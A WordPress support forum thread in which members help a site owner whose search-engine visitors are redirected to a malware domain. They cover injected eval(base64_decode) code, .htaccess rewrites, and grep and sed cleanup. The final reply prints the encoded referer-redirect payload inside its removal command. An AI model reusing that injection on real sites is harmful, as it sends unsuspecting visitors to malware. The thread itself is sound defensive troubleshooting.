
Hacked... but only through Google? (5 posts)

  1. benjancewicz
    Member
    Posted 2 years ago #

    So, it looks like a site we built got hacked.
    You can still get to it easy enough by going directly.

    BUT, if you search for MTCSLaw on Google, it brings you to this malware page:

    http://costabrava.bee.pl/

    So...
    How do I figure out where the problem is?
    How do I prevent it from happening again?
    How do I remove it?

    Thanks!

  2. esmi
    Forum Moderator
    Posted 2 years ago #

  3. Ken
    Member
    Posted 2 years ago #

    I had this same issue; fortunately it was very easy to track down on my site. Check your wp-config.php file and look for a line that starts with "eval(base64_decode" - delete this code all the way to the semicolon at the end of the line. Assuming the hacker didn't do additional damage, this should fix your issue.

    To prevent further issues I would make sure that you upgrade WordPress and all plugins and be sure to change all usernames and passwords.

    If you need any additional help, feel free to contact me.

  4. dittodot
    Member
    Posted 2 years ago #

    This hack could be caused by two things; Ken is correct that a base64 injection is one of them. A hack like this would cause the problem you are seeing; it may be in one or more files, however.

    The other option, which is what I think it is, is a .htaccess modification, sending users coming from search engines to malicious domains.
    To fix this, you can simply look in the .htaccess file and remove the code. It seems more likely this is your culprit after scanning over your site.
    --
    Best Regards,
    David G.
    http://www.dittodot.com

  5. dakruhm
    Member
    Posted 2 years ago #

    It's probably in more than one file; it's probably in all PHP files in the directory. With shell access:

    cd /path/to/wordpress/install/
    grep -r base64 ./*

    If you see something like the following, then it's redirecting:
    eval(base64_decode("DQplcnJvcl9yZXBvcnRpbm..."));

    The above is the shortened encoded code. The output of the code is actually:

    [Code moderated>]

    The site will respond normally if you hit it directly. If it comes from one of the referers (google, yahoo, myspace, facebook, etc.), it'll be redirected to the costabrava-dot-bee-dot-pl web site.

    Getting rid of the code:
    sed -i 's/eval(base64_decode("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\/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));//g' ./*.php

    Be very careful with the above. Don't adjust it if you are lost/uncertain, in which case it may be easier to restore from backup.

    Afterwards, spend some time hardening the site with the links above, especially checking extensions.

    HTH

    Thanks,

Topic Closed